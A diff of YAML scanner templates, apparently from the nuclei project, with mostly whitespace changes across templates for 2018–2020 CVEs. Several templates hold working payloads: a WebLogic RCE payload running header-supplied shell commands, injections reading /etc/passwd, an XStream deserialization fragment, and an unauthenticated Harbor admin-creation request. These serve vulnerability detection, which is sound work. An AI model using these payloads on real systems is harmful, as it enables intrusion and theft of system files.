<ofinish>0</ofinish> <ofinish>0</ofinish>
<closed>false</closed> <closed>false</closed>
</is> </is>
<consumed>false</consumed> <consumed>false</consumed>
</dataSource> </dataSource>
<transferFlavors/> <transferFlavors/>
</dataHandler> </dataHandler>
<dataLen>0</dataLen> <dataLen>0</dataLen>
</value> </value>
</jdk.nashorn.internal.objects.NativeString> </jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry> </entry>
<entry> <entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry> </entry>
</map> </map>
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -5,8 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342 - https://www.exploit-db.com/exploits/45342
tags: cve,cve2018,iot,lfi tags: cve,cve2018,iot,lfi
requests: requests:


@ -5,8 +5,8 @@ info:
author: 0x240x23elu author: 0x240x23elu
severity: critical severity: critical
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
- https://www.exploit-db.com/exploits/45438 - https://www.exploit-db.com/exploits/45438
tags: cve,cve2018,wordpress,wp-plugin,lfi tags: cve,cve2018,wordpress,wp-plugin,lfi
requests: requests:


@ -7,8 +7,8 @@ info:
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based) description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
tags: cve,cve2018,comodo,rce tags: cve,cve2018,comodo,rce
reference: reference:
- https://www.exploit-db.com/exploits/48825 - https://www.exploit-db.com/exploits/48825
- https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
requests: requests:
- raw: - raw:


@ -7,7 +7,7 @@ info:
description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
tags: cve,cve2018,appweb,auth-bypass tags: cve,cve2018,appweb,auth-bypass
reference: reference:
- https://github.com/embedthis/appweb/issues/610 - https://github.com/embedthis/appweb/issues/610
requests: requests:
- raw: - raw:


@ -6,9 +6,9 @@ info:
author: pdteam author: pdteam
severity: critical severity: critical
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- https://paper.seebug.org/1009/ - https://paper.seebug.org/1009/
tags: cve,cve2019,apache,rce,solr,oob tags: cve,cve2019,apache,rce,solr,oob
requests: requests:


@ -9,10 +9,10 @@ info:
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119 - https://www.exploit-db.com/exploits/50119
description: | description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is, 7.0.0 to 7.0.93 echoes user provided data without escaping and is,
therefore, vulnerable to XSS. SSI is disabled by default. therefore, vulnerable to XSS. SSI is disabled by default.
The printenv command is intended for debugging and is unlikely to be present in a production website. The printenv command is intended for debugging and is unlikely to be present in a production website.
tags: cve,cve2019,apache,xss tags: cve,cve2019,apache,xss
requests: requests:


@ -12,7 +12,7 @@ info:
google-dork: inurl:"/timesheet/login.php" google-dork: inurl:"/timesheet/login.php"
requests: requests:
- raw: # Metod POST From login.php - raw: # Metod POST From login.php
- | - |
POST /timesheet/login.php HTTP/1.1 POST /timesheet/login.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}


@ -7,9 +7,9 @@ info:
severity: medium severity: medium
tags: cve,cve2019,phpmyadmin,csrf tags: cve,cve2019,phpmyadmin,csrf
reference: reference:
- https://www.phpmyadmin.net/security/PMASA-2019-4/ - https://www.phpmyadmin.net/security/PMASA-2019-4/
- https://www.exploit-db.com/exploits/46982 - https://www.exploit-db.com/exploits/46982
- https://nvd.nist.gov/vuln/detail/CVE-2019-12616 - https://nvd.nist.gov/vuln/detail/CVE-2019-12616
requests: requests:
- method: GET - method: GET
@ -32,4 +32,4 @@ requests:
- type: status - type: status
status: status:
- 200 - 200
- 401 #password protected - 401 # password protected


@ -7,9 +7,9 @@ info:
severity: critical severity: critical
tags: cve,cve2019,dlink,router,iot tags: cve,cve2019,dlink,router,iot
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
- https://github.com/d0x0/D-Link-DIR-600M - https://github.com/d0x0/D-Link-DIR-600M
- https://www.exploit-db.com/exploits/47250 - https://www.exploit-db.com/exploits/47250
requests: requests:
- raw: - raw:


@ -6,7 +6,7 @@ info:
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
reference: reference:
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
- https://community.grafana.com/t/release-notes-v6-3-x/19202 - https://community.grafana.com/t/release-notes-v6-3-x/19202
tags: cve,cve2019,grafana tags: cve,cve2019,grafana


@ -9,7 +9,7 @@ info:
tags: cve,cve2019,webmin,rce tags: cve,cve2019,webmin,rce
requests: requests:
- raw: # - raw: #
- | - |
POST /password_change.cgi HTTP/1.1 POST /password_change.cgi HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}


@ -6,8 +6,8 @@ info:
description: | description: |
core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP. core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.
reference: reference:
- https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
- https://github.com/goharbor/harbor/issues/8951 - https://github.com/goharbor/harbor/issues/8951
tags: cve,cve2019,intrusive,harbor tags: cve,cve2019,intrusive,harbor
requests: requests:
@ -17,7 +17,7 @@ requests:
headers: headers:
Content-Type: application/json Content-Type: application/json
body: | body: |
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"} {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -14,7 +14,7 @@ requests:
- "{{BaseURL}}/getcfg.php" - "{{BaseURL}}/getcfg.php"
body: | body: |
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers: headers:
Content-Type: text/xml Content-Type: text/xml


@ -6,8 +6,8 @@ info:
severity: high severity: high
description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
- https://www.exploit-db.com/exploits/46729 - https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob tags: cve,cve2019,oracle,xxe,oob
requests: requests:


@ -6,8 +6,8 @@ info:
severity: high severity: high
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729 - https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob tags: cve,cve2019,oracle,xxe,oob
requests: requests:


@ -10,16 +10,16 @@ info:
requests: requests:
- raw: - raw:
- | - |
POST /rest/tinymce/1/macro/preview HTTP/1.1 POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: */* Accept: */*
Accept-Language: en-US,en;q=0.5 Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}} Referer: {{Hostname}}
Content-Length: 168 Content-Length: 168
Connection: close Connection: close
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -6,8 +6,8 @@ info:
severity: critical severity: critical
tags: cve,cve2019,nexus,rce tags: cve,cve2019,nexus,rce
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - https://nvd.nist.gov/vuln/detail/CVE-2019-7238
- https://github.com/jas502n/CVE-2019-7238 - https://github.com/jas502n/CVE-2019-7238
requests: requests:
- raw: - raw:


@ -11,7 +11,7 @@ info:
tags: cve,cve2019,emerge,rce tags: cve,cve2019,emerge,rce
requests: requests:
- raw: # Default Port - raw: # Default Port
- | - |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1 GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}


@ -13,22 +13,22 @@ info:
requests: requests:
- raw: - raw:
- | - |
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1 POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Length: 60 Content-Length: 60
Accept: application/json, text/plain, */* Accept: application/json, text/plain, */*
X-Requested-With: artUI X-Requested-With: artUI
serial: 58 serial: 58
X-Forwarded-For: 127.0.0.1 X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI Request-Agent: artifactoryUI
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Content-Type: application/json Content-Type: application/json
Origin: http://{{Hostname}} Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/artifactory/webapp/ Referer: http://{{Hostname}}/artifactory/webapp/
Accept-Language: en-US,en;q=0.9 Accept-Language: en-US,en;q=0.9
Connection: close Connection: close
{"user":"access-admin","password":"password","type":"login"} {"user":"access-admin","password":"password","type":"login"}
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -5,8 +5,8 @@ info:
author: 0x_Akoko author: 0x_Akoko
severity: critical severity: critical
reference: reference:
- https://www.exploit-db.com/exploits/46537 - https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618 - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi tags: cve,cve2019,wordpress,wp-plugin,lfi
requests: requests:


@ -6,9 +6,9 @@ info:
severity: low severity: low
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6. description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
reference: reference:
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- https://github.com/glpi-project/glpi/archive/9.4.6.zip - https://github.com/glpi-project/glpi/archive/9.4.6.zip
- https://nvd.nist.gov/vuln/detail/CVE-2020-11034 - https://nvd.nist.gov/vuln/detail/CVE-2020-11034
tags: cve,cve2020,redirect tags: cve,cve2020,redirect


@ -5,9 +5,9 @@ info:
severity: high severity: high
description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
reference: reference:
- https://github.com/pberba/CVE-2020-11978 - https://github.com/pberba/CVE-2020-11978
- https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
- https://twitter.com/wugeej/status/1400336603604668418 - https://twitter.com/wugeej/status/1400336603604668418
tags: cve,cve2020,apache,airflow,rce tags: cve,cve2020,apache,airflow,rce
requests: requests:


@ -10,16 +10,16 @@ info:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
# This template exploits a Python code injection in the Netsweeper # This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and # WebAdmin component's unixlogin.php script, for versions 6.4.4 and
# prior, to execute code as the root user. # prior, to execute code as the root user.
# Authentication is bypassed by sending a random whitelisted Referer # Authentication is bypassed by sending a random whitelisted Referer
# header in each request. # header in each request.
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs. # Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has # Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable. # been confirmed exploitable.
requests: requests:
- method: GET - method: GET


@ -6,9 +6,9 @@ info:
severity: high severity: high
reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
description: | description: |
An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
tags: cve,cve2020,wordpress tags: cve,cve2020,wordpress
requests: requests:


@ -5,12 +5,12 @@ info:
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: | description: |
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication, Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone. so it is dangerous because some confidential information entries will be disclosed to everyone.
reference: reference:
- https://kylin.apache.org/docs/release_notes.html - https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html - https://s.tencent.com/research/bsafe/1156.html


@ -17,7 +17,7 @@ requests:
Test-Header: cat /etc/passwd Test-Header: cat /etc/passwd
body: | body: |
test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -5,8 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: high severity: high
reference: reference:
- https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
- https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
tags: cve,cve2020,rce,yii tags: cve,cve2020,rce,yii
requests: requests:


@ -6,10 +6,10 @@ info:
severity: high severity: high
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227 - https://nvd.nist.gov/vuln/detail/CVE-2020-15227
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
tags: cve,cve2020,nette,rce tags: cve,cve2020,nette,rce
requests: requests:


@ -17,7 +17,7 @@ requests:
Referer: "{{Hostname}}/module/login/login.html" Referer: "{{Hostname}}/module/login/login.html"
body: | body: |
op=login&username=;`cat /etc/passwd`&password= op=login&username=;`cat /etc/passwd`&password=
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -7,9 +7,9 @@ info:
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
tags: cve,cve2020,netgear,auth-bypass tags: cve,cve2020,netgear,auth-bypass
reference: reference:
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - https://wzt.ac.cn/2021/01/13/AC2400_vuln/
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
requests: requests:
- raw: - raw:


@ -5,9 +5,9 @@ info:
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: | description: |
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI. SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
tags: cve,cve2020,sonarqube tags: cve,cve2020,sonarqube


@ -5,8 +5,8 @@ info:
author: geeknik author: geeknik
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference: reference:
- https://www.exploit-db.com/exploits/49314 - https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112 - https://www.tenable.com/cve/CVE-2020-36112
severity: critical severity: critical
tags: cve,cve2020,sqli,cse tags: cve,cve2020,sqli,cse


@ -7,8 +7,8 @@ info:
description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
tags: cve,cve2020,jira,atlassian tags: cve,cve2020,jira,atlassian
reference: reference:
- https://twitter.com/ptswarm/status/1402644004781633540 - https://twitter.com/ptswarm/status/1402644004781633540
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289 - https://nvd.nist.gov/vuln/detail/CVE-2020-36289
requests: requests:
- method: GET - method: GET


@ -5,7 +5,7 @@ info:
author: gy741 author: gy741
description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
reference: reference:
- https://cinzinga.com/CVE-2020-5307-5308/ - https://cinzinga.com/CVE-2020-5307-5308/
severity: critical severity: critical
tags: cve,cve2020,sqli tags: cve,cve2020,sqli


@ -13,8 +13,8 @@ info:
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
- https://www.hpe.com/us/en/home.html # vendor homepage - https://www.hpe.com/us/en/home.html # vendor homepage
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
requests: requests:
- method: GET - method: GET


@ -7,8 +7,8 @@ info:
tags: cve,cve2020,rce,liferay tags: cve,cve2020,rce,liferay
description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
reference: reference:
- https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
